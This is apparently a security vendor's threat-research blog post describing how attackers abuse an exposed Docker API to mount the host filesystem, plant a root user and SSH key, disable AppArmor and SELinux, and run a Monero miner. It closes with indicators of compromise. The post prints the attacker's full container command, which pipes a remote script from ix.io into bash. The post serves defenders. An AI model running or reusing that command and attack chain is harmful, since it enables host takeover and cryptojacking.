Docker API Honeypots

Threat Alert: Maneuver Docker API for Host Takeover

Docker clients can communicate with the daemon either locally, via a unix socket, or over a network via a TCP socket. Aqua's research team discovered an interesting attack vector running on top of an unsecured Docker socket API. Instead of running a malicious Docker image, the attacker changes the traditional entry-point to take control over the host machine via a Docker Socket.

Attack Chain

An attacker is able to mount the host’s file system by passing the flag,“ -v /:mnt”, to the “docker run” command. This basic capability of the Docker API is usually used to gain file persistency and is commonly used by containers. By mounting the file system, the attacker gains the ability to access the host’s file system and modify the host’s cron job scheduler to run the malicious payload. This activity wasn’t rooted in the deployed Docker image, but rather it was a legitimate image that was designed to avoid conventional tools that could detect the malicious payload. 

The image entry point was changed in order to download a script designed to execute the nefarious act.

The Full Container CMD

chroot /mnt /bin/sh -c /sbin/sysctl -w net.ipv4.conf.all.forwarding=1;curl -s http://gyazo.nl/411d2790f01244c93a864d51125722e8;curl -s -L http://ix.io/1XQa | bash;

Note: The curl command at the end of the cmd contains a bash script, which is the payload.

The Payload

The actual payload consists of a large bash script that runs directly on the host machine and leaves a backdoor in which a hacker can execute the mining algorithm.

The first step is a bash script that performs tests to identify possible threats and disable them immediately. For example, it can disable apparmor and selinux. (These are used to restrict programs capabilities, such as setting permissions on certain paths, or blocking the execution of applications on the host machine.)Image1

Interestingly, after disabling the security applications, it attempted to uninstall a cloud monitoring system that comes prefixed in Alibaba Cloud and Qcloud. Next, the “useradd” command creates a new root user on the host. This is not done on the container, but rather on the host, so that it can continue running in privileged mode.

Image2

It provides access via SSH logins from a remote machine to our host by adding an authorized key to gain persistency.

Image3

The Malicious Binary

The miner executable and config files are downloaded and the executable parses relevant parameters from the config file and begins mining. 

Image4

By executing the binary, we receive the following instructions:

image5

When loading on IDA, we see a statically linked binary which contains multiple XMR mining functions. 

image6

By uploading the file to VirusTotal, we see that this is a cryptocurrency mining executable:

image7

Image8

In Summary

While running an open API Docker may not seem risky, it could compromise your host and make it vulnerable to  hijacking for cryptocurrency mining and even a full takeover. This simple oversight could cause real damage. It could render your entire production internal network vulnerable and thereby compromise your sensitive databases, code, and productions systems.

New call-to-action

Indicators of Compromise (IoCs):

Miner file :
Sha256sum: e70e8dbf4fa242cfcafc66bc52eeef06cb1b8eb2218e75dd5902b6e5f8a99be6

Monero Address :
4Aotje6mGNPRcDQeqS7iUwRLGJhLLgJvfbS6Dju5peSACbVXTFhnds53xuoqif3JEcfbdjiW27xuAJiiKeiCGbuoACrutNE

 

 

Picture of Michael Katchinskiy

Michael Katchinskiy

Michael is a security researcher at Aqua. As part of the Aqua research team, his work focuses on researching vulnerabilities in the cloud native ecosystem. When he isn't at work, he enjoys a good kite-surfing session and watching a good movie.

Docker Security, Container Security, Container Vulnerability